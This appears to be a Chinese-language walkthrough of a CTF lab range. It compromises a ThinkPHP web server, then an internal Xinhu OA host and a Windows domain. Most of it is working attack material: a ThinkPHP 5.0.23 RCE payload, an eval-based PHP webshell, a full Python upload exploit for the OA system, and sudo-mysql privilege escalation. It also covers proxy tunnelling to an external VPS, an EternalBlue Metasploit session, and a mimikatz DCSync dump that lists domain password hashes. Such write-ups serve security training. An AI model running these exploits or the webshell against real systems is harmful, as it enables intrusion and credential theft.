0%

春秋云镜Initial

flag1

fscan起手

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
E:\CTFFIT\ONE-FOX集成工具箱_V8公开版_by狐狸\gui_scan\fscan>fscan -h 39.99.138.60

___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.3
start infoscan
39.99.138.60:80 open
39.99.138.60:22 open
[*] alive ports len is: 2
start vulscan
[*] WebTitle http://39.99.138.60 code:200 len:5578 title:Bootstrap Material Admin
[+] PocScan http://39.99.138.60 poc-yaml-thinkphp5023-method-rce poc1
已完成 2/2
[*] 扫描结束,耗时: 46.6863044s

存在thinkphp的某个rce漏洞,利用thinkphp框架漏洞工具

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
检测所有漏洞中......
=====================================================================
[-] 不存在ThinkPHP 2 RCE
[-] 不存在ThinkPHP 5.0 RCE
[-] 不存在ThinkPHP 5.0.10 construct RCE
[-] 不存在ThinkPHP 5.0.22/5.1.29 RCE
[+] 存在ThinkPHP 5.0.23 RCE
Payload: http://39.99.138.60//?s=captcha&test=-1 Post: _method=__construct&filter[]=phpinfo&method=get&server[REQUEST_METHOD]=1
[-] 不存在ThinkPHP 5.0.24-5.1.30 RCE
[-] 不存在ThinkPHP 5 文件包含漏洞
[-] 不存在ThinkPHP 5 show-id RCE
[-] 不存在ThinkPHP 5 method filter RCE
[-] 不存在ThinkPHP 5 session include
[-] 不存在ThinkPHP 5 SQL注入漏洞 && 敏感信息泄露
[-] 不存在ThinkPHP 5.x 数据库信息泄露
[-] 不存在ThinkPHP 5.x 日志泄露
[-] 不存在ThinkPHP 3.x RCE
[-] 不存在ThinkPHP 3.x 日志泄露
[-] 不存在ThinkPHP 3.x Log RCE
[-] 不存在ThinkPHP 6.x 日志泄露
[-] 不存在ThinkPHP 6 文件包含漏洞
[-] 不存在ThinkPHP 6 session文件写入
[-] 不存在ThinkPHP catch 命令执行漏洞
[-] 不存在ThinkPHP check-code sql注入漏洞
[-] 不存在ThinkPHP multi sql注入 && 信息泄露漏洞
[-] 不存在ThinkPHP orderid sql注入
[-] 不存在ThinkPHP update sql注入
[-] 不存在ThinkPHP recent_xff sql注入

探测出来之后点击getshell之后,就会帮我们上传对应的木马,用webshell管理工具连接即可

alt text

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
检测所有漏洞中......
=====================================================================
[-] 不存在ThinkPHP 2 RCE
[-] 不存在ThinkPHP 5.0 RCE
[-] 不存在ThinkPHP 5.0.10 construct RCE
[-] 不存在ThinkPHP 5.0.22/5.1.29 RCE
[+] 存在ThinkPHP 5.0.23 RCE
Payload: http://39.99.138.60//?s=captcha&test=-1 Post: _method=__construct&filter[]=phpinfo&method=get&server[REQUEST_METHOD]=1
[-] 不存在ThinkPHP 5.0.24-5.1.30 RCE
[-] 不存在ThinkPHP 5 文件包含漏洞
[-] 不存在ThinkPHP 5 show-id RCE
[-] 不存在ThinkPHP 5 method filter RCE
[-] 不存在ThinkPHP 5 session include
[-] 不存在ThinkPHP 5 SQL注入漏洞 && 敏感信息泄露
[-] 不存在ThinkPHP 5.x 数据库信息泄露
[-] 不存在ThinkPHP 5.x 日志泄露
[-] 不存在ThinkPHP 3.x RCE
[-] 不存在ThinkPHP 3.x 日志泄露
[-] 不存在ThinkPHP 3.x Log RCE
[-] 不存在ThinkPHP 6.x 日志泄露
[-] 不存在ThinkPHP 6 文件包含漏洞
[-] 不存在ThinkPHP 6 session文件写入
[-] 不存在ThinkPHP catch 命令执行漏洞
[-] 不存在ThinkPHP check-code sql注入漏洞
[-] 不存在ThinkPHP multi sql注入 && 信息泄露漏洞
[-] 不存在ThinkPHP orderid sql注入
[-] 不存在ThinkPHP update sql注入
[-] 不存在ThinkPHP recent_xff sql注入
[+] http://39.99.138.60//peiqi.php Pass:peiqi

看到上传的木马peiqi.php,密码是peiqi

使用哥斯拉连上去
alt text

进入之后即可进行命令知悉
alt text

打群友靶机的经验告诉我,这个就是个www-data权限,是远远不够的,需要进行提权

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
currentDir:/var/www/html/
fileRoot:[/]
currentUser:www-data
osInfo:Linux ubuntu-web01 5.4.0-110-generic #124-Ubuntu SMP Thu Apr 14 19:46:19 UTC 2022 x86_64

/var/www/html/ >id

uid=33(www-data) gid=33(www-data) groups=33(www-data)
/var/www/html/ >sudo -l

Matching Defaults entries for www-data on ubuntu-web01:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on ubuntu-web01:
(root) NOPASSWD: /usr/bin/mysql
/var/www/html/ >

sudo -l出来,mysql可以利用,参考提权宝典
https://gtfobins.github.io/gtfobins/mysql/

1
2
3
4
/var/www/html/ >sudo mysql -e '\! /bin/sh'


/var/www/html/ >

注意到这里毫无回显,其实是因为这里并不是一个交互式shell,所以无法切换到root的shell,但是我们依然可以读取root的文件

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15

/var/www/html/ >sudo mysql -e '\! tac /root/flag/flag01.txt'

flag01: flag{60b53231-

Congratulations!!! You found the first flag, the next flag may be in a server in the internal network.

░░ ░░ ░░ ░░ ░░ ░░░░░░░ ░░ ░░ ░░ ░░ ░░ ░░░ ░░░░░░░░
██ ░░██░██░██ ░██ ░░███████ ░██ ░░██░██ ░██░██ ░░███ ░░████████
██ ░░██ ░██░██░░░░░░██░░██ ██ ░██ ░░██ ░██░░░░░░██░██ ░░████░░██ ░░░░██
██░██ ░██ ██████████░██ ░██░██░░░██ ██████████░██ ░░██░██░██ █████
░░███ ░██ ██ ░░██ ░██ ░██░███████ ██ ░░██ ░██ ░░██ ░██░██
░░██ ██ ░██ ██░░██ ██ ░░██░██ ░██ ██░░██ ░██░░██ ░██ ██ ░░
░░██ ██ ░██ ████ ██░░░░░██ ░██░░░░██ ████ ░██░██ ░██ ██░░░░░░██
██ ██ ██ ██ ███████ ███████ ██ ████ ██ ████████

第一部分flag,get!

flag2

flag2是在内网的机器中的,我们需要通过哥斯拉把fscan和内网代理搭建的工具传上去

alt text

注意这里fscan是通过大文件上传的方式上传上去的,普通的上传会失败

1
2
3
4
5
6
7
8
9
10
11
/tmp >ls

fscan
linux_x64_agent
/tmp >chmod +x fscan


/tmp >chmod +x linux_x64_agent


/tmp >

回到这里,给两个文件添加可执行权限

然后到vps上开启我们的服务(admin)端

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
linux_x64_admin -l 1122


[*] Starting admin node on port 1122

.-') .-') _ ('\ .-') /' ('-. ('\ .-') /' ('-.
( OO ). ( OO) ) '.( OO ),' ( OO ).-. '.( OO ),' ( OO ).-.
(_)---\_)/ '._ .-'),-----. ,--./ .--. / . --. /,--./ .--. / . --. / ,--. ,--.
/ _ | |'--...__)( OO' .-. '| | | | \-. \ | | | | \-. \ \ '.' /
\ :' '. '--. .--'/ | | | || | | |,.-'-' | || | | |,.-'-' | | .-') /
'..'''.) | | \_) | |\| || |.'.| |_)\| |_.' || |.'.| |_)\| |_.' |(OO \ /
.-._) \ | | \ | | | || | | .-. || | | .-. | | / /\_
\ / | | '' '-' '| ,'. | | | | || ,'. | | | | | '-./ /.__)
'-----' '--' '-----' '--' '--' '--' '--''--' '--' '--' '--' '--'
{ v2.2 Author:ph4ntom }
[*] Waiting for new connection...

agent端就正常连接即可

服务端依旧搭建socks代理

1
2
3
4
5
6
(admin) >> use 0 
(node 0) >> socks 1123
[*] Trying to listen on 0.0.0.0:1123......
[*] Waiting for agent's response......
[*] Socks start successfully!
(node 0) >>
1
2
3
4
5
6
7
8
(node 0) >> shell
[*] Waiting for response.....
bash: cannot set terminal process group (734): Inappropriate ioctl for device
bash: no job control in this shell
www-data@ubuntu-web01:/tmp$ whoami
whoami
www-data
www-data@ubuntu-web01:/tmp$

获取交互式shell,前面因为不是交互式shell而无法提权,这里可以进行提权

1
2
3
4
www-data@ubuntu-web01:/tmp$ sudo mysql -e '\! /bin/sh'
sudo mysql -e '\! /bin/sh'
whoami
root

得到了root权限

用script语句升级一下为一个较为完全的shell

1
2
3
4
5
script -qc /bin/bash /dev/null
root@ubuntu-web01:/tmp# whoami
whoami
root
root@ubuntu-web01:/tmp#
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
root@ubuntu-web01:/tmp# ifconfig
ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 172.22.1.15 netmask 255.255.0.0 broadcast 172.22.255.255
inet6 fe80::216:3eff:fe2b:eeb4 prefixlen 64 scopeid 0x20<link>
ether 00:16:3e:2b:ee:b4 txqueuelen 1000 (Ethernet)
RX packets 148714 bytes 206304284 (206.3 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 44225 bytes 6093177 (6.0 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 1554 bytes 145035 (145.0 KB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 1554 bytes 145035 (145.0 KB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

ifconfig查看内网网段信息,然后使用fscan进行扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
root@ubuntu-web01:/tmp# ./fscan -h 172.22.1.0/24
./fscan -h 172.22.1.0/24

___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.4
start infoscan
(icmp) Target 172.22.1.15 is alive
(icmp) Target 172.22.1.2 is alive
(icmp) Target 172.22.1.21 is alive
(icmp) Target 172.22.1.18 is alive
[*] Icmp alive hosts len is: 4
172.22.1.18:3306 open
172.22.1.18:445 open
172.22.1.21:445 open
172.22.1.2:445 open
172.22.1.15:22 open
172.22.1.18:139 open
172.22.1.21:139 open
172.22.1.2:139 open
172.22.1.18:135 open
172.22.1.21:135 open
172.22.1.2:135 open
172.22.1.18:80 open
172.22.1.15:80 open
172.22.1.2:88 open
[*] alive ports len is: 14
start vulscan
[*] WebTitle http://172.22.1.15 code:200 len:5578 title:Bootstrap Material Admin
[*] NetInfo
[*]172.22.1.21
[->]XIAORANG-WIN7
[->]172.22.1.21
[*] NetInfo
[*]172.22.1.2
[->]DC01
[->]172.22.1.2
[*] NetInfo
[*]172.22.1.18
[->]XIAORANG-OA01
[->]172.22.1.18
[*] NetBios 172.22.1.2 [+] DC:DC01.xiaorang.lab Windows Server 2016 Datacenter 14393
[*] OsInfo 172.22.1.2 (Windows Server 2016 Datacenter 14393)
[*] NetBios 172.22.1.21 XIAORANG-WIN7.xiaorang.lab Windows Server 2008 R2 Enterprise 7601 Service Pack 1
[+] MS17-010 172.22.1.21 (Windows Server 2008 R2 Enterprise 7601 Service Pack 1)
[*] WebTitle http://172.22.1.18 code:302 len:0 title:None 跳转url: http://172.22.1.18?m=login
[*] WebTitle http://172.22.1.18?m=login code:200 len:4012 title:信呼协同办公系统
[*] NetBios 172.22.1.18 XIAORANG-OA01.xiaorang.lab Windows Server 2012 R2 Datacenter 9600
[+] PocScan http://172.22.1.15 poc-yaml-thinkphp5023-method-rce poc1
已完成 14/14
[*] 扫描结束,耗时: 8.048895233s

看这四台机器

1
2
3
4
(icmp) Target 172.22.1.15     is alive
(icmp) Target 172.22.1.2 is alive
(icmp) Target 172.22.1.21 is alive
(icmp) Target 172.22.1.18 is alive

15我们已经拿下了,21存在一个MS17-010,18是一个交信呼协同办公系统的玩意,2则是DC01

现在需要建立本机的内网代理,方便我们对内网进行攻击

利用proxifier搭建代理,这里不多说

访问172.72.1.18,这里存在弱口令admin/admin123

同时这个信呼OA存在漏洞,我们可以直接用exp来打

这里弄一个1.php

1
<?php eval($_POST["1"]);?>

这里弄一个脚本exp.py

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
import requests


session = requests.session()

url_pre = 'http://172.22.1.18/'
url1 = url_pre + '?a=check&m=login&d=&ajaxbool=true&rnd=533953'
url2 = url_pre + '/index.php?a=upfile&m=upload&d=public&maxsize=100&ajaxbool=true&rnd=798913'
url3 = url_pre + '/task.php?m=qcloudCos|runt&a=run&fileid=11'

data1 = {
'rempass': '0',
'jmpass': 'false',
'device': '1625884034525',
'ltype': '0',
'adminuser': 'YWRtaW4=',
'adminpass': 'YWRtaW4xMjM=',
'yanzm': ''
}


r = session.post(url1, data=data1)
r = session.post(url2, files={'file': open('1.php', 'r+')})

filepath = str(r.json()['filepath'])
filepath = "/" + filepath.split('.uptemp')[0] + '.php'
id = r.json()['id']

url3 = url_pre + f'/task.php?m=qcloudCos|runt&a=run&fileid={id}'

r = session.get(url3)
r = session.get(url_pre + filepath + "?1=system('dir');")
print(r.text)

然后通过proxychains来打

1
2
3
4
5
6
7
8
┌──(root㉿kali)-[/home/kali]
└─# proxychains python3 test.py
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Strict chain ... 38.55.99.185:1123 ... 172.22.1.18:80 ... OK
<br />
<b>Notice</b>: Undefined offset: 1 in <b>C:\phpStudy\PHPTutorial\WWW\upload\2025-11\05_20335282.php</b> on line <b>1</b><br />

成功打入
用相对路径访问一下

alt text

看一下,发现是存在的,使用哥斯拉连接

1
2
3
4
5
6
7
8
9
currentDir:C:/phpStudy/PHPTutorial/WWW/upload/2025-11/
fileRoot:[C:/]
currentUser:SYSTEM
osInfo:Windows NT XIAORANG-OA01 6.3 build 9600 (Windows Server 2012 R2 Datacenter Edition) i586

C:/phpStudy/PHPTutorial/WWW/upload/2025-11/ >whoami

nt authority\system
C:/phpStudy/PHPTutorial/WWW/upload/2025-11/ >

直接就是system用户,那我们直接拿flag
alt text

1
2
3
4
5
6
7
8
9
10
11
12
13
 ___    ___ ___  ________  ________  ________  ________  ________   ________     
|\ \ / /|\ \|\ __ \|\ __ \|\ __ \|\ __ \|\ ___ \|\ ____\
\ \ \/ / | \ \ \ \|\ \ \ \|\ \ \ \|\ \ \ \|\ \ \ \\ \ \ \ \___|
\ \ / / \ \ \ \ __ \ \ \\\ \ \ _ _\ \ __ \ \ \\ \ \ \ \ ___
/ \/ \ \ \ \ \ \ \ \ \\\ \ \ \\ \\ \ \ \ \ \ \\ \ \ \ \|\ \
/ /\ \ \ \__\ \__\ \__\ \_______\ \__\\ _\\ \__\ \__\ \__\\ \__\ \_______\
/__/ /\ __\ \|__|\|__|\|__|\|_______|\|__|\|__|\|__|\|__|\|__| \|__|\|_______|
|__|/ \|__|


flag02: 2ce3-4813-87d4-

Awesome! ! ! You found the second flag, now you can attack the domain controller.

flag3

21这台机器是存在永恒之蓝的,直接对这个下手看看

使用msf,先通过proxychains限定一下msf走的流量

然后搜索ms17相关的

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
┌──(root㉿kali)-[/home/kali]
└─# proxychains msfconsole
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
Metasploit tip: Enable verbose logging with set VERBOSE true
[proxychains] DLL init: proxychains-ng 4.17le...|


______________________________________________________________________________
| |
| METASPLOIT CYBER MISSILE COMMAND V5 |
|______________________________________________________________________________|
\ / /
\ . / / x
\ / /
\ / + /
\ + / /
* / /
/ . /
X / / X
/ ###
/ # % #
/ ###
. /
. / . * .
/
*
+ *

^
#### __ __ __ ####### __ __ __ ####
#### / \ / \ / \ ########### / \ / \ / \ ####
################################################################################
################################################################################
# WAVE 5 ######## SCORE 31337 ################################## HIGH FFFFFFFF #
################################################################################
https://metasploit.com


=[ metasploit v6.4.84-dev ]
+ -- --=[ 2,547 exploits - 1,309 auxiliary - 1,680 payloads ]
+ -- --=[ 431 post - 49 encoders - 13 nops - 9 evasion ]

Metasploit Documentation: https://docs.metasploit.com/
The Metasploit Framework is a Rapid7 Open Source Project

[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
msf > search ms17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17

Matching Modules
================

# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
1 \_ target: Automatic Target . . . .
2 \_ target: Windows 7 . . . .
3 \_ target: Windows Embedded Standard 7 . . . .
4 \_ target: Windows Server 2008 R2 . . . .
5 \_ target: Windows 8 . . . .
6 \_ target: Windows 8.1 . . . .
7 \_ target: Windows Server 2012 . . . .
8 \_ target: Windows 10 Pro . . . .
9 \_ target: Windows 10 Enterprise Evaluation . . . .
10 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
11 \_ target: Automatic . . . .
12 \_ target: PowerShell . . . .
13 \_ target: Native upload . . . .
14 \_ target: MOF upload . . . .
15 \_ AKA: ETERNALSYNERGY . . . .
16 \_ AKA: ETERNALROMANCE . . . .
17 \_ AKA: ETERNALCHAMPION . . . .
18 \_ AKA: ETERNALBLUE . . . .
19 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
20 \_ AKA: ETERNALSYNERGY . . . .
21 \_ AKA: ETERNALROMANCE . . . .
22 \_ AKA: ETERNALCHAMPION . . . .
23 \_ AKA: ETERNALBLUE . . . .
24 auxiliary/scanner/smb/smb_ms17_010 . normal No MS17-010 SMB RCE Detection
25 \_ AKA: DOUBLEPULSAR . . . .
26 \_ AKA: ETERNALBLUE . . . .
27 exploit/windows/fileformat/office_ms17_11882 2017-11-15 manual No Microsoft Office CVE-2017-11882
28 auxiliary/admin/mssql/mssql_escalate_execute_as . normal No Microsoft SQL Server Escalate EXECUTE AS
29 auxiliary/admin/mssql/mssql_escalate_execute_as_sqli . normal No Microsoft SQL Server SQLi Escalate Execute AS
30 exploit/windows/smb/smb_doublepulsar_rce 2017-04-14 great Yes SMB DOUBLEPULSAR Remote Code Execution
31 \_ target: Execute payload (x64) . . . .
32 \_ target: Neutralize implant . . . .


Interact with a module by name or index. For example info 32, use 32 or use exploit/windows/smb/smb_doublepulsar_rce
After interacting with a module you can manually set a TARGET with set TARGET 'Neutralize implant'

[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
msf > use exploit/windows/smb/ms17_010_eternalblue
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
msf exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/bind_tcp_uuid
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
payload => windows/x64/meterpreter/bind_tcp_uuid
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
msf exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 172.22.1.21
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
RHOSTS => 172.22.1.21
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
msf exploit(windows/smb/ms17_010_eternalblue) > run
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[*] 172.22.1.21:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[proxychains] Strict chain ... 38.55.99.185:1123 ... 172.22.1.21:445 ... OK
[proxychains] Strict chain ... 38.55.99.185:1123 ... 172.22.1.21:135 ... OK
[+] 172.22.1.21:445 - Host is likely VULNERABLE to MS17-010! - Windows Server 2008 R2 Enterprise 7601 Service Pack 1 x64 (64-bit)
/usr/share/metasploit-framework/vendor/bundle/ruby/3.3.0/gems/recog-3.1.21/lib/recog/fingerprint/regexp_factory.rb:34: warning: nested repeat operator '+' and '?' was replaced with '*' in regular expression
[*] 172.22.1.21:445 - Scanned 1 of 1 hosts (100% complete)
[+] 172.22.1.21:445 - The target is vulnerable.
[*] 172.22.1.21:445 - Connecting to target for exploitation.
[proxychains] Strict chain ... 38.55.99.185:1123 ... 172.22.1.21:445 ... OK
[+] 172.22.1.21:445 - Connection established for exploitation.
[+] 172.22.1.21:445 - Target OS selected valid for OS indicated by SMB reply
[*] 172.22.1.21:445 - CORE raw buffer dump (53 bytes)
[*] 172.22.1.21:445 - 0x00000000 57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32 Windows Server 2
[*] 172.22.1.21:445 - 0x00000010 30 30 38 20 52 32 20 45 6e 74 65 72 70 72 69 73 008 R2 Enterpris
[*] 172.22.1.21:445 - 0x00000020 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20 50 e 7601 Service P
[*] 172.22.1.21:445 - 0x00000030 61 63 6b 20 31 ack 1
[+] 172.22.1.21:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 172.22.1.21:445 - Trying exploit with 12 Groom Allocations.
[*] 172.22.1.21:445 - Sending all but last fragment of exploit packet
[*] 172.22.1.21:445 - Starting non-paged pool grooming
[proxychains] Strict chain ... 38.55.99.185:1123 ... 172.22.1.21:445 ... OK
[+] 172.22.1.21:445 - Sending SMBv2 buffers
[proxychains] Strict chain ... 38.55.99.185:1123 ... 172.22.1.21:445 ... OK
[proxychains] Strict chain ... 38.55.99.185:1123 ... 172.22.1.21:445 ... OK
[proxychains] Strict chain ... 38.55.99.185:1123 ... 172.22.1.21:445 ... OK
[proxychains] Strict chain ... 38.55.99.185:1123 ... 172.22.1.21:445 ... OK
[proxychains] Strict chain ... 38.55.99.185:1123 ... 172.22.1.21:445 ... OK
[proxychains] Strict chain ... 38.55.99.185:1123 ... 172.22.1.21:445 ... OK
[proxychains] Strict chain ... 38.55.99.185:1123 ... 172.22.1.21:445 ... OK
[proxychains] Strict chain ... 38.55.99.185:1123 ... 172.22.1.21:445 ... OK
[proxychains] Strict chain ... 38.55.99.185:1123 ... 172.22.1.21:445 ... OK
[proxychains] Strict chain ... 38.55.99.185:1123 ... 172.22.1.21:445 ... OK
[proxychains] Strict chain ... 38.55.99.185:1123 ... 172.22.1.21:445 ... OK
[proxychains] Strict chain ... 38.55.99.185:1123 ... 172.22.1.21:445 ... OK
[proxychains] Strict chain ... 38.55.99.185:1123 ... 172.22.1.21:445 ... OK
[+] 172.22.1.21:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 172.22.1.21:445 - Sending final SMBv2 buffers.
[proxychains] Strict chain ... 38.55.99.185:1123 ... 172.22.1.21:445 ... OK
[proxychains] Strict chain ... 38.55.99.185:1123 ... 172.22.1.21:445 ... OK
[proxychains] Strict chain ... 38.55.99.185:1123 ... 172.22.1.21:445 ... OK
[proxychains] Strict chain ... 38.55.99.185:1123 ... 172.22.1.21:445 ... OK
[proxychains] Strict chain ... 38.55.99.185:1123 ... 172.22.1.21:445 ... OK
[proxychains] Strict chain ... 38.55.99.185:1123 ... 172.22.1.21:445 ... OK
[*] 172.22.1.21:445 - Sending last fragment of exploit packet!
[*] 172.22.1.21:445 - Receiving response from exploit packet
[+] 172.22.1.21:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 172.22.1.21:445 - Sending egg to corrupted connection.
[*] 172.22.1.21:445 - Triggering free of corrupted buffer.
[*] Started bind TCP handler against 172.22.1.21:4444
[proxychains] Strict chain ... 38.55.99.185:1123 ... 172.22.1.21:4444 ... OK
[*] Sending stage (203846 bytes) to 172.22.1.21
[proxychains] DLL init: proxychains-ng 4.17
[*] Meterpreter session 1 opened (192.168.5.128:41824 -> 38.55.99.185:1123) at 2025-11-05 20:48:51 +0800
[+] 172.22.1.21:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 172.22.1.21:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 172.22.1.21:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17

关于这部分的解释,参考deepseek即可
https://chat.deepseek.com/share/djha7r1etl8m9x4ss0

然后去获取域内用户的hash,最后连接即可

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
meterpreter > getuid
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
Server username: NT AUTHORITY\SYSTEM
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
meterpreter > load kiwi
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
Loading extension kiwi...
.#####. mimikatz 2.2.0 20191125 (x64/windows)
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/

Success.
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
meterpreter > kiwi_cmd lsadump::dcsync /domain:xiaorang.lab /all /csv
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[DC] 'xiaorang.lab' will be the domain
[DC] 'DC01.xiaorang.lab' will be the DC server
[DC] Exporting domain 'xiaorang.lab'
[rpc] Service : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
502 krbtgt fb812eea13a18b7fcdb8e6d67ddc205b 514
1106 Marcus e07510a4284b3c97c8e7dee970918c5c 512
1107 Charles f6a9881cd5ae709abb4ac9ab87f24617 512
1000 DC01$ 28462b35265440e802ac0d118ea9941d 532480
500 Administrator 10cf89a850fb1cdbe6bb432b859164c8 512
1104 XIAORANG-OA01$ b69c24b4e495904afbdee7546a1d9e42 4096
1108 XIAORANG-WIN7$ 4df3570cf16f129c5a48cffc544a6676 4096

[proxychains] DLL init: proxychains-ng 4.17
